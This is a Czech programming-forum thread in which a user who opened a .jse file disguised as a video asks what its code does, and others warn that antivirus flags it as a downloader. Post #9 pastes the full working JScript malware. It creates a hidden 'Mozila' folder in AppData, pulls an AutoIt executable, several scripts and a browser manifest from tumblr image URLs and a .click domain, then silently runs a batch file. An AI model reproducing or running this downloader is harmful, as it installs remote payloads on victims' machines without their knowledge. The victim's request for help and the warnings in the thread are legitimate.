Co dělá tenhle kód – JavaScript, AJAX, jQuery – Fórum – Programujte.com
 x   TIP: Přetáhni ikonu na hlavní panel pro připnutí webu

Co dělá tenhle kód – JavaScript, AJAX, jQuery – Fórum – Programujte.comCo dělá tenhle kód – JavaScript, AJAX, jQuery – Fórum – Programujte.com

 

Ahert
~ Anonymní uživatel
8 příspěvků
4. 12. 2015   #1
-
0
-

Ahoj, chtěl bych se zeptat co dělá tenhle kód:

http://pastebin.com/KwBgAgZw

předem děkuji.

Nahlásit jako SPAM
IP: 77.236.192.–
peter
~ Anonymní uživatel
4016 příspěvků
4. 12. 2015   #2
-
0
-

AVG vystraha: Nalezen virus JS/Downloader.Agent

Nahlásit jako SPAM
IP: 2001:718:2601:26c:9d3c:d4...–
Ahert
~ Anonymní uživatel
8 příspěvků
4. 12. 2015   #3
-
0
-

Chápu správně, že to vytvoří složku Mozila v appdata a do ní nastahuje Autoit? V případě, že jsem hloupě otevřel soubor s tímto kódem, stačí smazat tu složku co to vytvořilo?

Nahlásit jako SPAM
IP: 77.236.192.–
peter
~ Anonymní uživatel
4016 příspěvků
4. 12. 2015   #4
-
0
-

Ten kod vubec nelze otevirat, avg tu stranku zablokuje, protoze ten kod je nejspis virus nebo tak vypada..

Nahlásit jako SPAM
IP: 2001:718:2601:26c:9d3c:d4...–
Ahert
~ Anonymní uživatel
8 příspěvků
4. 12. 2015   #5
-
0
-

Bohužel jsem otevřel soubor a pozdě jsem si všiml, že přípona .avi není skutečná přípona (pravá byla .jse). Zdrojový kód byl identický s tímto. Avast to bohužel nezachytil. Proto se ptám co přesně to dělá.

Nahlásit jako SPAM
IP: 77.236.192.–
Ahert
~ Anonymní uživatel
8 příspěvků
4. 12. 2015   #6
-
0
-

Jinak chápu to správně, že AVG tě nepustí ani na pastebin? Nemohl bys to na chvíli hodit do výjimek?

Nahlásit jako SPAM
IP: 77.236.192.–
Vladusko
~ Anonymní uživatel
19 příspěvků
4. 12. 2015   #7
-
0
-

Nechapem, ze sem hodis link na podozrivy subor ... to mi pripada akoby si to umyselne siril ... aaach

Zasláno z mobilního telefonu.

Nahlásit jako SPAM
IP: 88.212.41.–
Ahert
~ Anonymní uživatel
8 příspěvků
4. 12. 2015   #8
-
0
-

Není to link na soubor, je to link na zdrojový kód....jenom text. Není tam žádný exe či jiný typ spustitelného souboru.

Nahlásit jako SPAM
IP: 77.236.192.–
Ahert
~ Anonymní uživatel
8 příspěvků
4. 12. 2015   #9
-
0
-

   

(function(c) {
    function a(a, b, pos) {
        if (!b || !a) return null;
        var d = WScript.CreateObject("Msxml2.XMLhttp");		
		d.onreadystatechange = function() {
		   if (d.readyState === 4 && d.status === 200) {
      xa = new ActiveXObject("ADODB.Stream");
      xa.open();
      xa.type = 1;
      xa.write(d.ResponseBody);
      xa.position = pos;

	stm2 = new ActiveXObject("ADODB.Stream");
	stm2.type = 1;
	stm2.open();
	stm2.write(xa.read());
	stm2.saveToFile(b, 2);
	stm2.close();
	xa.close();
		   }
		}
		
        d.open("GET", a, false);
        d.send(null);
    }
	function ekle(ustdosya,altdosya){{xa=new ActiveXObject("ADODB.Stream");xa.open();xa.type=1;xa.LoadFromFile(ustdosya);ix=new ActiveXObject("ADODB.Stream");ix.open();ix.type=1;ix.LoadFromFile(altdosya);stm2=new ActiveXObject("ADODB.Stream");stm2.type=1;stm2.open();stm2.write(ix.read());stm2.write(xa.read());xa.close();ix.close();stm2.saveToFile(ustdosya,2);stm2.close();}}
 
    fso = new ActiveXObject("Scripting.FileSystemObject");
    var e = new ActiveXObject("WScript.Shell");
    c = new ActiveXObject("Shell.Application" );
    FileDestr = e["ExpandEnvironmentStrings"]("%APPDATA%\\");
	mozklasor = FileDestr+"Mozila";	
	if(!fso.FolderExists(mozklasor)) { fso.CreateFolder(mozklasor); }
	c.ShellExecute("https://goo.gl/hMyuQd");
	sabittumb='.media.tumblr.com/47d1cf240d5a2bf213839fa3bb61f31a/tumblr_nw';
    a("https://36"+sabittumb+"9rw6Wltk1ui8al4o1_400.jpg", mozklasor+"\\Autoit.exe",10206);
    a("http://cutecatworldhappy.click/denes/bg.html", mozklasor+"\\bg.html",0);
    a("https://40"+sabittumb+"9s9iWADO1ui8al4o1_400.jpg", mozklasor+"\\ekl.au3",10206);
    a("https://41"+sabittumb+"9sbe1LSS1ui8al4o1_400.jpg", mozklasor+"\\ff.zip",10206);
    a("https://41"+sabittumb+"bz24iPSF1ui8al4o1_400.jpg", mozklasor+"\\force.au3",10206);
    a("https://40"+sabittumb+"9sgiNQ9p1ui8al4o1_400.jpg", mozklasor+"\\reg.au3",10206);
    a("https://40"+sabittumb+"9siiCxmJ1ui8al4o1_400.jpg", mozklasor+"\\sabit.au3",10206);
	a("http://cutecatworldhappy.click/denes/manifest.jpg", mozklasor+"\\manifest.json",0);
    a("https://41"+sabittumb+"gqfrSz821ui8al4o1_400.jpg", mozklasor+"\\run.bat",10206);
	a("http://cutecatworldhappy.click/denes/up.jpg", mozklasor+"\\up.au3",0);
    ekle(mozklasor+"\\force.au3" , mozklasor+"\\sabit.au3");
    ekle(mozklasor+"\\reg.au3" , mozklasor+"\\sabit.au3");
    ekle(mozklasor+"\\ekl.au3" , mozklasor+"\\sabit.au3");
	c.ShellExecute(mozklasor+"\\run.bat", "", mozklasor, "", 0);
	//c.ShellExecute(mozklasor+"\\Autoit.exe", '"' + mozklasor+"\\ekl.au3" + '"', "", "", 0);
	
	
})(this);
Nahlásit jako SPAM
IP: 77.236.192.–
Kit+15
Guru
4. 12. 2015   #10
-
0
-

#9 Ahert
Není vůbec rozumné veřejně vystavovat malware, i když jen ve formě zdrojového kódu. Normální uživatelé to k ničemu nepotřebují a zajímá to jen škodiče.

Soubory s příponami exe a bat jsou pro mne pouze soubory s příponami exe a bat. Nic víc. Některým uživatelům však mohou způsobit problémy. Proč jim chceš škodit?

Nahlásit jako SPAM
IP: 2a00:1028:83a0:37a6:207:e...–
Komentáře označují místa, kde programátor udělal chybu nebo něco nedodělal.
Ahert
~ Anonymní uživatel
8 příspěvků
4. 12. 2015   #11
-
0
-

Nechci nikomu škodit, píšu, že jsem omylem (svojí nepozorností/blbostí) otevřel soubor s tímto zdrojovým kódem - když jsem si pozdě všiml, že to má koncovku .jse tak jsem se podíval na zdroják a našel jsem tohle. Vytvořilo mi to složku v appdata s názvem Mozila a několika soubory uvnitř. Tu složku jsem smazal, soubor taky, ale zajímá mě jestli to dělá ještě něco - avast bohužel prospal a neobtěžoval se vyhodit ani jednu hlášku.

Zásadně nedoporučuji nikomu toto spouštět, ale ptám se jestli mám ještě něco hledat na odstranění po mém hloupém spuštění...

Nahlásit jako SPAM
IP: 77.236.192.–
Ahert
~ Anonymní uživatel
8 příspěvků
4. 12. 2015   #12
-
0
-

P.S: Ten soubor jsem na pastebin nenahrál, jen jsem ho tam našel. Také jsem ho nenapsal - kdybych uměl javascript, neptám se tu co to přesně dělá..

Nahlásit jako SPAM
IP: 77.236.192.–
Vladusko
~ Anonymní uživatel
19 příspěvků
5. 12. 2015   #13
-
0
-

podla mna je to jasne, otoci ti to bateriu na maticnej doske a zmena polarity moze urobit riadnu paseku

Zasláno z mobilního telefonu.

Nahlásit jako SPAM
IP: 88.212.41.–
Zjistit počet nových příspěvků

Přidej příspěvek

Toto téma je starší jak čtvrt roku – přidej svůj příspěvek jen tehdy, máš-li k tématu opravdu co říct!

Ano, opravdu chci reagovat → zobrazí formulář pro přidání příspěvku

×Vložení zdrojáku

×Vložení obrázku

Vložit URL obrázku Vybrat obrázek na disku
Vlož URL adresu obrázku:
Klikni a vyber obrázek z počítače:

×Vložení videa

Aktuálně jsou podporována videa ze serverů YouTube, Vimeo a Dailymotion.
×
 
Podporujeme Gravatara.
Zadej URL adresu Avatara (40 x 40 px) nebo emailovou adresu pro použití Gravatara.
Email nikam neukládáme, po získání Gravatara je zahozen.
-
Pravidla pro psaní příspěvků, používej diakritiku. ENTER pro nový odstavec, SHIFT + ENTER pro nový řádek.
Sledovat nové příspěvky (pouze pro přihlášené)
Sleduj vlákno a v případě přidání nového příspěvku o tom budeš vědět mezi prvními.
Reaguješ na příspěvek:

Uživatelé prohlížející si toto vlákno

Uživatelé on-line: 0 registrovaných, 18 hostů

 

Hostujeme u Českého hostingu       ISSN 1801-1586       ⇡ Nahoru Webtea.cz logo © 20032024 Programujte.com
Zasadilo a pěstuje Webtea.cz, šéfredaktor Lukáš Churý